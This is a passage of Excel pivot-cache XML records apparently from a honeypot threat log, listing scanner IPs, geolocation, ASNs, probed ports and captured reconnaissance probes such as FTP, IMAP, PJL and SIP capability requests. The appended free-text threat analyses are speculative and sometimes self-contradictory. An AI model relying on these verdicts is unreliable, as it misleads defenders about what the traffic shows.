+https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57ec:b03f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The data suggests that there was an attempted connection to the TELNET service, but no further action occurred as it resulted in &quot;No Action&quot; taken. This could indicate a probe or reconnaissance attempt by malicious actors. The lack of any subsequent activity may also suggest that the actor lost interest or encountered difficulties. &amp;&amp; The data suggests an attempt to connect to a Redis service, which is likely a scanning or probing activity to exploit potential vulnerabilities. The fact that no data is being sent (indicated by Data_REDIS: NA) implies the attacker may be trying to fingerprint the system for further exploitation. This could be indicative of reconnaissance before launching a more sophisticated attack."/>
    <m/>
  </r>
  <r>
    <x v="100"/>
    <x v="100"/>
    <s v="node-14m2.pool-101-109.dynamic.totinternet.net&amp;&amp;node-14m2.pool-101-109.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-30T17:57:57"/>
    <d v="2025-04-30T14:33:33"/>
    <d v="2025-04-30T17:57:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="2010-12-13"/>
    <s v="TOT-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-01-17 03:50:09"/>
    <s v="2026-01-17 03:50:09"/>
    <s v="2025-01-20 03:36:34"/>
    <s v="['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']"/>
    <s v="GMO Internet, Inc."/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:656d:cd9a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="101"/>
    <x v="101"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:54:22"/>
    <d v="2025-04-30T17:54:22"/>
    <d v="2025-04-30T17:54:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:b591"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="102"/>
    <x v="102"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:50:22"/>
    <d v="2025-04-30T17:50:22"/>
    <d v="2025-04-30T17:50:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783e:5177"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="103"/>
    <x v="103"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:43:34"/>
    <d v="2023-08-11T04:03:00"/>
    <d v="2025-04-30T17:43:34"/>
    <n v="57"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="5900&amp;&amp;10312&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="Railtel"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,51502)}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,52119)}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,61251)}&amp;&amp;{Data_SMB:Incoming connection (202.170.204.227,61405)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caaa:cce3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No connection attempted to MySQL service, suggesting no malicious activity related to this specific service at this time. _x000a_There was an attempt but it failed or timed out as indicated by 'NA' which stands for Not Available._x000a_This may be due to firewall configuration, host blocking or simply no data available from the database. &amp;&amp; The data suggests an attempt to exploit Microsoft SQL Server, likely for unauthorized database access or injection of malicious code. This could be part of a larger attack targeting sensitive data or systems. The goal is probably to gain unauthorized access or control over the targeted system."/>
    <m/>
  </r>
  <r>
    <x v="104"/>
    <x v="104"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:16:44"/>
    <d v="2025-04-30T17:16:44"/>
    <d v="2025-04-30T17:16:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5838"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="105"/>
    <x v="105"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:16:37"/>
    <d v="2025-04-30T17:15:42"/>
    <d v="2025-04-30T17:16:37"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Begusarai"/>
    <s v="Begusarai"/>
    <s v="1276609"/>
    <s v="NA"/>
    <s v="25.4185"/>
    <s v="86.1339"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1994-08-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:aa93"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="106"/>
    <x v="106"/>
    <s v="sharp.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:58"/>
    <d v="2024-12-10T23:05:14"/>
    <d v="2025-04-30T17:11:58"/>
    <n v="256"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_POP3_H13&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_REDIS_H17&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_FTP_H23"/>
    <s v="110&amp;&amp;6379&amp;&amp;1521&amp;&amp;9100&amp;&amp;1433&amp;&amp;NA&amp;&amp;389&amp;&amp;445&amp;&amp;3389&amp;&amp;47983&amp;&amp;5432&amp;&amp;1080&amp;&amp;143&amp;&amp;21&amp;&amp;3306&amp;&amp;443&amp;&amp;80&amp;&amp;37041&amp;&amp;25&amp;&amp;5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;request&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.233.76.135:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'bhjgdwkf', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.105;tag=bhjgdwkf', 'max-forwards': '0', 'to': 'sip:109.123.229.33', 'via': 'SIP/2.0/UDP 185.247.137.105:5060;branch=z9hG4bKbhjgdwkf;received=185.247.137.105;rport=48010'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.116.162:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'ihxlrqwm', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.105;tag=ihxlrqwm', 'max-forwards': '0', 'to': 'sip:185.74.222.213', 'via': 'SIP/2.0/UDP 185.247.137.105:5060;branch=z9hG4bKihxlrqwm;received=185.247.137.105;rport=49016'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'jmpsdguz', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.105;tag=jmpsdguz', 'max-forwards': '0', 'to': 'sip:194.4.48.242', 'via': 'SIP/2.0/UDP 185.247.137.105:5060;branch=z9hG4bKjmpsdguz;received=185.247.137.105;rport=54824'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.233.76.135:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9f7:8969"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze. &amp;&amp; No activity detected against LDAP service, possibly legitimate access or service down. _x000a_ No malicious activity found for this specific log entry. _x000a_ Service check indicates normal operation. &amp;&amp; The data indicates that there was an attempt to access a POP3 service, which is a common target for malicious activity such as spamming or identity theft via unauthorized email account access. This could be a reconnaissance step by attackers before attempting more advanced attacks on the system. The lack of authentication suggests a brute-force attack may have been attempted. &amp;&amp; No log data provided, therefore no analysis can be made."/>
    <m/>
  </r>
  <r>
    <x v="107"/>
    <x v="107"/>
    <s v="NA&amp;&amp;218-161-9-237.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:47"/>
    <d v="2024-03-23T06:35:57"/>
    <d v="2025-04-30T17:11:47"/>
    <n v="3289"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_IRC_H21&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_LDAP_H42&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;36161&amp;&amp;23&amp;&amp;6379&amp;&amp;6667&amp;&amp;443&amp;&amp;23&amp;&amp;389&amp;&amp;14530&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:9ed"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze or describe any activity. &amp;&amp; No log data provided, cannot analyze."/>
    <m/>
  </r>
  <r>
    <x v="108"/>
    <x v="108"/>
    <s v="NA&amp;&amp;sh-ams-nl-gp1-wk112a.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:37"/>
    <d v="2024-07-08T17:14:00"/>
    <d v="2025-04-30T17:11:37"/>
    <n v="328"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_RDP_H20&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_IRC_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;23&amp;&amp;5432&amp;&amp;445&amp;&amp;9100&amp;&amp;161&amp;&amp;3389&amp;&amp;3306&amp;&amp;6667&amp;&amp;143&amp;&amp;110&amp;&amp;443&amp;&amp;1521&amp;&amp;38516&amp;&amp;NA&amp;&amp;21&amp;&amp;389&amp;&amp;54921&amp;&amp;22874"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap AMS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OELP0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'IEJP0'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.128.56;rport=41717'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JNIF0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MLLG0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'GENG0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO 